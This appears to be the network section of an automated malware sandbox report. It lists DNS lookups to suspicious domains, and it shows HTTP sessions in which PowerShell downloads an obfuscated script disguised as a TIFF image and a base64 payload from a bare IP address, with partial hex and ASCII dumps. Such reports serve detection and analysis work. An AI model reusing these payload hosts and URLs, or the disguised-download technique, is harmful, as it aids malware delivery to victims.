                                                                                                      Nov 26, 2024 09:51:06.613878012 CET8049966185.151.30.221192.168.2.9
                                                                                                      Nov 26, 2024 09:51:06.613923073 CET4996680192.168.2.9185.151.30.221
                                                                                                      Nov 26, 2024 09:51:06.675731897 CET4996680192.168.2.9185.151.30.221
                                                                                                      Nov 26, 2024 09:51:07.693753004 CET4997280192.168.2.9185.151.30.221
                                                                                                      Nov 26, 2024 09:51:07.813788891 CET8049972185.151.30.221192.168.2.9
                                                                                                      Nov 26, 2024 09:51:07.813863993 CET4997280192.168.2.9185.151.30.221
                                                                                                      Nov 26, 2024 09:51:07.820318937 CET4997280192.168.2.9185.151.30.221
                                                                                                      Nov 26, 2024 09:51:07.940406084 CET8049972185.151.30.221192.168.2.9
                                                                                                      Nov 26, 2024 09:51:09.262494087 CET8049972185.151.30.221192.168.2.9
                                                                                                      Nov 26, 2024 09:51:09.262600899 CET8049972185.151.30.221192.168.2.9
                                                                                                      Nov 26, 2024 09:51:09.262748003 CET4997280192.168.2.9185.151.30.221
                                                                                                      Nov 26, 2024 09:51:09.265336037 CET4997280192.168.2.9185.151.30.221
                                                                                                      Nov 26, 2024 09:51:09.385344028 CET8049972185.151.30.221192.168.2.9
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Nov 26, 2024 09:49:21.235935926 CET5707653192.168.2.91.1.1.1
                                                                                                      Nov 26, 2024 09:49:21.376039028 CET53570761.1.1.1192.168.2.9
                                                                                                      Nov 26, 2024 09:50:11.530014992 CET5846453192.168.2.91.1.1.1
                                                                                                      Nov 26, 2024 09:50:11.683135986 CET53584641.1.1.1192.168.2.9
                                                                                                      Nov 26, 2024 09:50:28.973469973 CET6125653192.168.2.91.1.1.1
                                                                                                      Nov 26, 2024 09:50:29.200123072 CET53612561.1.1.1192.168.2.9
                                                                                                      Nov 26, 2024 09:50:43.585314035 CET5025553192.168.2.91.1.1.1
                                                                                                      Nov 26, 2024 09:50:43.732909918 CET53502551.1.1.1192.168.2.9
                                                                                                      Nov 26, 2024 09:50:58.241873026 CET5747453192.168.2.91.1.1.1
                                                                                                      Nov 26, 2024 09:50:59.246736050 CET5747453192.168.2.91.1.1.1
                                                                                                      Nov 26, 2024 09:50:59.251632929 CET53574741.1.1.1192.168.2.9
                                                                                                      Nov 26, 2024 09:50:59.385577917 CET53574741.1.1.1192.168.2.9
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Nov 26, 2024 09:49:21.235935926 CET192.168.2.91.1.1.10x9bd5Standard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:11.530014992 CET192.168.2.91.1.1.10xfe82Standard query (0)www.fzaqzjja.shopA (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:28.973469973 CET192.168.2.91.1.1.10xc354Standard query (0)www.artherapy.onlineA (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:43.585314035 CET192.168.2.91.1.1.10x4ab1Standard query (0)www.sportvas.onlineA (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:58.241873026 CET192.168.2.91.1.1.10x443cStandard query (0)www.pegji.onlineA (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:59.246736050 CET192.168.2.91.1.1.10x443cStandard query (0)www.pegji.onlineA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Nov 26, 2024 09:49:06.166728973 CET1.1.1.1192.168.2.90x4423No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:49:06.166728973 CET1.1.1.1192.168.2.90x4423No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:49:21.376039028 CET1.1.1.1192.168.2.90x9bd5No error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:49:21.376039028 CET1.1.1.1192.168.2.90x9bd5No error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:11.683135986 CET1.1.1.1192.168.2.90xfe82No error (0)www.fzaqzjja.shop172.67.163.245A (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:11.683135986 CET1.1.1.1192.168.2.90xfe82No error (0)www.fzaqzjja.shop104.21.15.203A (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:29.200123072 CET1.1.1.1192.168.2.90xc354No error (0)www.artherapy.onlineartherapy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:29.200123072 CET1.1.1.1192.168.2.90xc354No error (0)artherapy.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:29.200123072 CET1.1.1.1192.168.2.90xc354No error (0)artherapy.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:43.732909918 CET1.1.1.1192.168.2.90x4ab1No error (0)www.sportvas.online184.94.215.26A (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:59.251632929 CET1.1.1.1192.168.2.90x443cNo error (0)www.pegji.online185.151.30.221A (IP address)IN (0x0001)false
                                                                                                      Nov 26, 2024 09:50:59.385577917 CET1.1.1.1192.168.2.90x443cNo error (0)www.pegji.online185.151.30.221A (IP address)IN (0x0001)false
                                                                                                      • 3105.filemail.com
                                                                                                      • 146.70.155.254
                                                                                                      • www.fzaqzjja.shop
                                                                                                      • www.artherapy.online
                                                                                                      • www.sportvas.online
                                                                                                      • www.pegji.online
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.949722146.70.155.254807648C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:49:14.306046963 CET337OUTGET /1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIF HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                      Host: 146.70.155.254
                                                                                                      Connection: Keep-Alive
                                                                                                      Nov 26, 2024 09:49:15.839370012 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 26 Nov 2024 08:49:15 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Mon, 25 Nov 2024 11:24:22 GMT
                                                                                                      ETag: "22c42-627baf9713f54"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 142402
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: image/tiff
                                                                                                      Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 64 00 69 00 4c 00 52 00 4f 00 43 00 6f 00 57 00 6d 00 70 00 7a 00 70 00 64 00 62 00 52 00 20 00 3d 00 20 00 22 00 4e 00 70 00 47 00 4c 00 57 00 6a 00 6b 00 57 00 55 00 53 00 55 00 41 00 57 00 52 00 4c 00 22 00 0d 00 0a 00 50 00 50 00 55 00 78 00 55 00 69 00 66 00 65 00 6a 00 61 00 4c 00 74 00 68 00 6b 00 43 00 20 00 3d 00 20 00 22 00 57 00 74 00 4c 00 4c 00 4e 00 4e 00 52 00 4b 00 68 00 57 00 69 00 57 00 6b 00 6d 00 5a 00 22 00 0d 00 0a 00 5a 00 74 00 62 00 76 00 70 00 57 00 71 00 55 00 6a 00 63 00 4c 00 4c 00 62 00 65 00 57 00 20 00 3d 00 20 00 22 00 69 00 67 00 47 00 6b 00 4b 00 57 00 57 00 4e 00 55 00 41 00 6a 00 53 00 69 00 5a 00 63 00 22 00 0d 00 0a 00 55 00 6b 00 4c 00 49 00 4c 00 6b 00 51 00 4f 00 4e 00 4b 00 57 00 42 00 65 00 47 00 6f 00 20 00 3d 00 20 00 22 00 49 00 6c 00 71 00 69 00 48 00 78 00 47 00 6f 00 4e 00 6c 00 6e 00 4c 00 7a 00 70 00 4c 00 22 00 0d 00 0a 00 61 00 42 00 4e 00 62 00 69 00 4c 00 57 00 69 00 49 00 6b 00 61 00 57 00 57 00 4a 00 6f 00 20 00 [TRUNCATED]
                                                                                                      Data Ascii: diLROCoWmpzpdbR = "NpGLWjkWUSUAWRL"PPUxUifejaLthkC = "WtLLNNRKhWiWkmZ"ZtbvpWqUjcLLbeW = "igGkKWWNUAjSiZc"UkLILkQONKWBeGo = "IlqiHxGoNlnLzpL"aBNbiLWiIkaWWJo = "WGWcercadeirakeolfilkWc"nWxxzQiGWZvirdK = "GldLpOmLKWxKKWG"WKivJGWuGizsuSW = "tccGKnGLecercadeiraNIfu"csBccpfGGiPPKjL = "OWKNKikKQWWhKZz"oIAlhaANBWzLLot = "umqRbiWPOtffiUZ"pbUNrreCbPLizug = "zLemKWiWcuckWLL"LWnBqLPcZRfipgi = "PKRUfmLBoizGLOa"LLUGKiiLlGPANWd = "KlUorWNrkm
                                                                                                      Nov 26, 2024 09:49:15.839402914 CET1236INData Raw: 00 4c 00 43 00 6f 00 70 00 6d 00 22 00 0d 00 0a 00 67 00 57 00 52 00 75 00 6f 00 63 00 50 00 6f 00 4e 00 4b 00 62 00 69 00 4f 00 6b 00 5a 00 20 00 3d 00 20 00 22 00 68 00 4c 00 4c 00 4c 00 5a 00 6b 00 68 00 65 00 41 00 48 00 42 00 53 00 6b 00 6b
                                                                                                      Data Ascii: LCopm"gWRuocPoNKbiOkZ = "hLLLZkheAHBSkkW"ghaiULmtctJWWzN = "pLhPGBfWxLnKBmi"KGqKULvzjeLzbKv = "fucUtkiqlxLbPIk"ti
                                                                                                      Nov 26, 2024 09:49:15.839426041 CET1236INData Raw: 00 3d 00 20 00 22 00 75 00 61 00 51 00 43 00 6b 00 54 00 62 00 50 00 54 00 5a 00 6c 00 69 00 5a 00 67 00 75 00 22 00 0d 00 0a 00 55 00 7a 00 65 00 73 00 54 00 43 00 51 00 55 00 47 00 57 00 6b 00 75 00 71 00 4e 00 62 00 20 00 3d 00 20 00 22 00 4a
                                                                                                      Data Ascii: = "uaQCkTbPTZliZgu"UzesTCQUGWkuqNb = "JKbcLJtxSqIKBAL"uqCWipiIZKnbIzP = "fmzbsjBKKPbrWaU"tGvKkiRakRNiLue = "ddGWm
                                                                                                      Nov 26, 2024 09:49:15.839440107 CET1236INData Raw: 00 62 00 4b 00 4e 00 51 00 4e 00 6b 00 4c 00 4c 00 74 00 47 00 66 00 6f 00 47 00 69 00 20 00 3d 00 20 00 22 00 52 00 4a 00 75 00 5a 00 68 00 52 00 41 00 64 00 47 00 65 00 63 00 47 00 4c 00 41 00 6f 00 22 00 0d 00 0a 00 57 00 6f 00 57 00 5a 00 6b
                                                                                                      Data Ascii: bKNQNkLLtGfoGi = "RJuZhRAdGecGLAo"WoWZkpjicRhlckm = "imhibicmipebKNU"izZbfeLtiWmNclG = "RiOWcdiaPifcxiU"PRmqiCWjZKW
                                                                                                      Nov 26, 2024 09:49:15.839452028 CET1236INData Raw: 00 4c 00 4c 00 74 00 4a 00 65 00 68 00 5a 00 50 00 20 00 3d 00 20 00 22 00 63 00 47 00 4b 00 63 00 61 00 6d 00 6b 00 4b 00 63 00 6e 00 63 00 69 00 57 00 41 00 65 00 22 00 0d 00 0a 00 63 00 51 00 6b 00 76 00 42 00 4b 00 62 00 42 00 68 00 52 00 7a
                                                                                                      Data Ascii: LLtJehZP = "cGKcamkKcnciWAe"cQkvBKbBhRzkncl = "ALLRpALRCLRlixL"pxpxAZvlCLqisKn = "NNWLUnPNnWAZuef"icZlLApOcercadeir
                                                                                                      Nov 26, 2024 09:49:15.839466095 CET1236INData Raw: 00 4b 00 69 00 63 00 70 00 63 00 50 00 63 00 6f 00 64 00 67 00 4c 00 22 00 0d 00 0a 00 6b 00 4c 00 41 00 69 00 64 00 73 00 68 00 57 00 71 00 69 00 4c 00 6e 00 71 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 6d 00 78 00 5a 00 57 00 47 00 6e 00 6d 00 41
                                                                                                      Data Ascii: KicpcPcodgL"kLAidshWqiLnqKk = "mxZWGnmAcKNcLLf"lcGfUaTtxnNbiWP = "idihffzdRUKzKev"rnhBpgOWSLbUkLk = "JOAWUaqtGLmL
                                                                                                      Nov 26, 2024 09:49:15.839479923 CET1236INData Raw: 00 57 00 65 00 41 00 42 00 72 00 4c 00 47 00 20 00 3d 00 20 00 22 00 61 00 57 00 6e 00 62 00 6f 00 4a 00 71 00 69 00 68 00 68 00 71 00 53 00 65 00 68 00 70 00 22 00 0d 00 0a 00 65 00 47 00 5a 00 47 00 69 00 71 00 67 00 54 00 66 00 69 00 69 00 69
                                                                                                      Data Ascii: WeABrLG = "aWnboJqihhqSehp"eGZGiqgTfiiiitR = "AILcPmHULaTzNGP"NadLuhKtiihfchb = "zIxLcNWOpgULKaK"KpfGLmSAmvNfWdK =
                                                                                                      Nov 26, 2024 09:49:15.839579105 CET1236INData Raw: 00 7a 00 66 00 66 00 76 00 64 00 6d 00 4b 00 70 00 6b 00 4b 00 62 00 65 00 22 00 0d 00 0a 00 6c 00 62 00 4c 00 6d 00 64 00 4c 00 57 00 55 00 64 00 6e 00 57 00 69 00 5a 00 55 00 6f 00 20 00 3d 00 20 00 22 00 66 00 66 00 61 00 4e 00 6c 00 65 00 4c
                                                                                                      Data Ascii: zffvdmKpkKbe"lbLmdLWUdnWiZUo = "ffaNleLTmleUhCb"WeWooKlxWLRmZHa = "NKLrhpfscObPhKJ"izKWuNPijWHeAoN = "RzWrlnWciclkL
                                                                                                      Nov 26, 2024 09:49:15.839591026 CET1236INData Raw: 00 6f 00 64 00 6b 00 57 00 63 00 4f 00 20 00 3d 00 20 00 22 00 6d 00 6c 00 57 00 50 00 69 00 4c 00 6f 00 7a 00 69 00 78 00 70 00 43 00 52 00 63 00 57 00 22 00 0d 00 0a 00 52 00 6e 00 57 00 69 00 57 00 65 00 5a 00 53 00 4b 00 75 00 47 00 4c 00 75
                                                                                                      Data Ascii: odkWcO = "mlWPiLozixpCRcW"RnWiWeZSKuGLuhB = "sRWciZmPLZxZeJC"mUqsGWTZOupNjHL = "eLcZsKkrlGiAnKr"LWLIWdNdRLcLiaa =
                                                                                                      Nov 26, 2024 09:49:15.839605093 CET1236INData Raw: 00 4b 00 73 00 63 00 22 00 0d 00 0a 00 6d 00 70 00 57 00 47 00 4b 00 6d 00 70 00 63 00 43 00 4b 00 4b 00 6f 00 70 00 63 00 57 00 20 00 3d 00 20 00 22 00 47 00 63 00 41 00 50 00 69 00 47 00 63 00 65 00 72 00 63 00 61 00 64 00 65 00 69 00 72 00 61
                                                                                                      Data Ascii: Ksc"mpWGKmpcCKKopcW = "GcAPiGcercadeiraUbWKTKp"GiLBoiUmeWWmuPi = "iNKGbUqzqWAtnif"NknUCWZkLLnfLpl = "HWcRhxkhRuKNpk
                                                                                                      Nov 26, 2024 09:49:15.959567070 CET1236INData Raw: 00 68 00 6e 00 73 00 22 00 0d 00 0a 00 0d 00 0a 00 6e 00 4b 00 4b 00 66 00 66 00 50 00 73 00 57 00 57 00 74 00 4b 00 57 00 71 00 6b 00 42 00 20 00 3d 00 20 00 22 00 57 00 57 00 43 00 55 00 75 00 50 00 69 00 75 00 51 00 6e 00 68 00 4c 00 6b 00 43
                                                                                                      Data Ascii: hns"nKKffPsWWtKWqkB = "WWCUuPiuQnhLkCc"OBlaKnmANBzpnTc = "ieImTiqfpfKpcUW"pZWTmcHzsCOgWLK = "UcWklUbieWokidr"Wz


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.949792146.70.155.254807184C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:49:45.504179001 CET78OUTGET /1150/CRMMA.txt HTTP/1.1
                                                                                                      Host: 146.70.155.254
                                                                                                      Connection: Keep-Alive
                                                                                                      Nov 26, 2024 09:49:47.039601088 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 26 Nov 2024 08:49:46 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Thu, 14 Nov 2024 04:31:00 GMT
                                                                                                      ETag: "5daac-626d7eadf9e1f"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 383660
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: text/plain
                                                                                                      Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                      Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                      Nov 26, 2024 09:49:47.039621115 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEpp7KS2WZxCJ329lGN4VweCLUFW/Wh4luoNd1e5v2hr6Qkz0qTLRVkqBd8KF3WWrSLtEwm4IX7bs4m0
                                                                                                      Nov 26, 2024 09:49:47.039642096 CET1236INData Raw: 70 4d 73 63 67 36 4a 33 55 4c 55 49 45 6d 43 6a 76 54 59 59 4c 72 78 55 69 70 65 4b 6e 66 75 55 6b 72 5a 56 37 41 37 50 42 55 44 78 74 73 38 59 38 70 73 34 64 78 39 79 58 45 59 2f 77 79 44 4b 79 7a 53 63 69 65 67 41 55 43 48 52 56 57 44 57 5a 72
                                                                                                      Data Ascii: pMscg6J3ULUIEmCjvTYYLrxUipeKnfuUkrZV7A7PBUDxts8Y8ps4dx9yXEY/wyDKyzSciegAUCHRVWDWZrGpufitC4S8uopEI6vVXa4ncHAw/KL+9ua5KaWO1rLWXC8uoK3r0fIMHQSiP82zIsecP0EDEtlSTFsCZpWnL1iajJ1C3+18OShU0O3DXim/2hpHMBxmljN0lxw31HliJfN1xTvYbb3w/yVBGsReaQElZjx77L2tKne
                                                                                                      Nov 26, 2024 09:49:47.039653063 CET1236INData Raw: 33 65 49 4b 77 2b 2b 66 50 49 45 6a 78 45 67 73 2f 5a 30 43 54 2f 79 4d 6b 34 36 44 39 46 68 79 48 71 4d 66 39 66 44 6c 68 6e 49 41 4d 74 4a 47 35 51 4e 62 6c 38 55 77 61 52 63 6b 67 30 63 44 41 53 6d 48 77 77 4a 77 74 71 6f 75 6d 57 41 32 76 79
                                                                                                      Data Ascii: 3eIKw++fPIEjxEgs/Z0CT/yMk46D9FhyHqMf9fDlhnIAMtJG5QNbl8UwaRckg0cDASmHwwJwtqoumWA2vyqdjrjcP1pqjZ5rLvkGZvU1qKmrXQ3SYDTnWY90TBEJQ6sY8v75Fsox07U8++XShd5eVSFRp/nZFxKf98oWen8jEU6Eeb9ApICQQuczGMzZ3srlpokKziAv5up1Eqk46T4WMJbVIauNgINNvAniGXsrSHpf+Eb9T7P
                                                                                                      Nov 26, 2024 09:49:47.039664030 CET1236INData Raw: 31 54 36 69 79 49 35 37 2b 66 69 6a 73 4f 75 69 38 54 66 61 71 57 4d 52 4e 62 64 65 6e 6b 50 4a 74 32 34 47 4d 32 33 2f 56 6d 52 4e 49 58 44 2f 39 6c 56 63 32 59 55 49 53 72 71 75 38 76 52 4b 53 56 70 4e 52 74 59 78 75 46 31 47 70 74 57 4d 4a 2b
                                                                                                      Data Ascii: 1T6iyI57+fijsOui8TfaqWMRNbdenkPJt24GM23/VmRNIXD/9lVc2YUISrqu8vRKSVpNRtYxuF1GptWMJ+8wsncsaYvxO6RfuJPJCERxaWmH8EW7lTB5OcHlswaRpzlCTf+vzt92ahdeWzk+jP2zRfwDvbKwGDpPT1etItJ7r85WkSzBlZ4J7yiVfarFtpE0Dr9hxXhPQ2eOWm3xncARxOpJQYfMB99DNF1wfhi5/otNNAu6150
                                                                                                      Nov 26, 2024 09:49:47.039675951 CET1236INData Raw: 63 73 2f 61 69 68 53 34 74 4d 68 38 68 70 54 34 41 6a 42 66 6c 78 4a 57 54 34 2f 58 56 38 55 64 59 32 39 78 53 31 4d 6d 54 7a 4b 42 64 45 4a 78 48 4b 35 37 68 63 5a 6a 63 32 54 67 36 70 43 37 51 4a 64 6f 4b 64 62 68 72 53 43 56 72 56 31 41 67 48
                                                                                                      Data Ascii: cs/aihS4tMh8hpT4AjBflxJWT4/XV8UdY29xS1MmTzKBdEJxHK57hcZjc2Tg6pC7QJdoKdbhrSCVrV1AgHa4Xok+mxGjbWX+7gtKHDsJGgGy0/Vag2AP3UG3t7POr7pb4wzKl3Y0OZjnm29StZ6ucQDllwGkofaqbCEF99R6HHjGxz+cRMZiDoYoEgHIVEAcY1wrsHj2JTLa+H7YcIkIByxCha6GRGDZCv9/8OL51KH8jurCv8f
                                                                                                      Nov 26, 2024 09:49:47.039690018 CET1236INData Raw: 76 4c 41 4d 38 7a 37 6c 52 79 48 69 54 31 66 6e 67 58 6d 30 70 75 77 6e 71 47 58 4b 41 78 64 53 43 59 57 57 31 55 4c 77 61 6c 70 69 56 57 39 75 35 5a 2f 61 73 69 45 72 76 33 45 76 64 37 6b 2f 42 50 34 36 63 33 33 65 4b 4f 63 34 2b 6a 2b 39 62 63
                                                                                                      Data Ascii: vLAM8z7lRyHiT1fngXm0puwnqGXKAxdSCYWW1ULwalpiVW9u5Z/asiErv3Evd7k/BP46c33eKOc4+j+9bcHDeGWnrJuPqncV5XCYPDK1KeaGkzokE/lxLoRckwT5UiJWZve9GlAOWIpX3a4dg78c6CDynIlW3Mbl1dwKXRxtRzrrhBuCsf9p7G96mANzuvUa466I+bJWxibADi3I+0zNBCoQLs1KJ+n1c+576Zc8aQBVtT+f/Kq
                                                                                                      Nov 26, 2024 09:49:47.039762974 CET108INData Raw: 43 5a 6b 4c 49 75 4b 52 32 58 75 64 55 6a 47 75 6f 62 38 56 48 59 71 6e 39 41 7a 51 39 64 4e 53 4b 4e 51 41 6f 62 37 67 41 58 6b 6f 66 35 77 74 4f 41 46 49 47 57 71 77 73 50 4f 6c 67 37 33 43 35 44 30 6d 36 6e 30 5a 4f 46 38 53 78 48 32 34 73 71
                                                                                                      Data Ascii: CZkLIuKR2XudUjGuob8VHYqn9AzQ9dNSKNQAob7gAXkof5wtOAFIGWqwsPOlg73C5D0m6n0ZOF8SxH24sqYhKCwbsZ8769qHDY3JfIoljly8
                                                                                                      Nov 26, 2024 09:49:47.039773941 CET1236INData Raw: 75 6d 63 4f 4b 51 37 4a 6f 55 46 64 4a 55 47 43 35 52 4f 66 43 51 52 74 73 67 73 63 6f 35 6a 7a 6b 69 54 37 30 54 45 63 61 44 79 41 6d 68 73 58 38 66 31 59 42 62 55 53 67 5a 6f 37 6a 74 4c 70 6d 4f 45 59 6f 4f 4a 6f 78 4a 6f 6c 51 42 4c 4e 41 62
                                                                                                      Data Ascii: umcOKQ7JoUFdJUGC5ROfCQRtsgsco5jzkiT70TEcaDyAmhsX8f1YBbUSgZo7jtLpmOEYoOJoxJolQBLNAbNLVoobh/HPe1v6aI26fUXC+W25wCax5htsM+/LTeJ8/HGUDEhPXGv4BKKXzvaoEgSpZwUFuW0GAGxJmeNM0UWSpYkn1/wPRTDBBKpa4xfFSTatekciFFtvm19FrxtUwmdRa07ywgQ9/UddrAiDgtj6Pz2v7z+ybKW
                                                                                                      Nov 26, 2024 09:49:47.039787054 CET1236INData Raw: 58 2f 7a 4d 50 55 77 5a 4e 70 74 69 68 74 47 6e 39 70 6d 57 74 69 68 6d 59 39 79 75 70 34 43 49 6b 44 43 56 52 54 39 2b 39 41 4d 42 4b 41 44 4d 49 68 2b 44 63 38 4d 71 54 69 6e 6e 6b 38 62 50 68 66 38 70 4e 4a 78 53 46 44 62 4e 7a 46 70 39 46 43
                                                                                                      Data Ascii: X/zMPUwZNptihtGn9pmWtihmY9yup4CIkDCVRT9+9AMBKADMIh+Dc8MqTinnk8bPhf8pNJxSFDbNzFp9FCaIQFR9Nao0MCheL2Vf7AlRE727tmZleuivM0OsGVuWTosNZuvOIArbXNTrO7UoKvW72er7oRNvEZGgzXZMoHE3KbsD9Nz/Te4VxtpVcV81/88N33sEPFzU7AKddlBEMk0d5l0UJaefdEDzRo8mk66Whbw7nHI9hE0
                                                                                                      Nov 26, 2024 09:49:47.159873009 CET1236INData Raw: 7a 37 78 7a 4e 4c 55 41 6f 6d 42 62 51 36 46 51 79 66 35 79 4d 45 37 65 54 67 68 66 4f 36 78 74 51 4f 63 36 63 32 5a 42 59 72 6b 33 4f 49 6c 6e 78 2f 57 4d 52 63 45 77 35 35 4c 59 43 42 62 7a 51 6f 37 73 30 55 7a 66 6a 31 73 30 39 36 77 66 77 33
                                                                                                      Data Ascii: z7xzNLUAomBbQ6FQyf5yME7eTghfO6xtQOc6c2ZBYrk3OIlnx/WMRcEw55LYCBbzQo7s0Uzfj1s096wfw3dw0Nm9kg4Tk9GP7ca38nP4C+UK5br2mn7yETXR/9HuOMIgPhVzCukkf6ccmha9hiT64KanffSOT2ohe6YBajXhGyRj7leXHlK9UyeaCB5EtH5JKxt+dLeyLPM63UGcWGOqOduGVbmpqMyDzeZPHiLBcMt6ENzFwxc


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.949840172.67.163.245803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
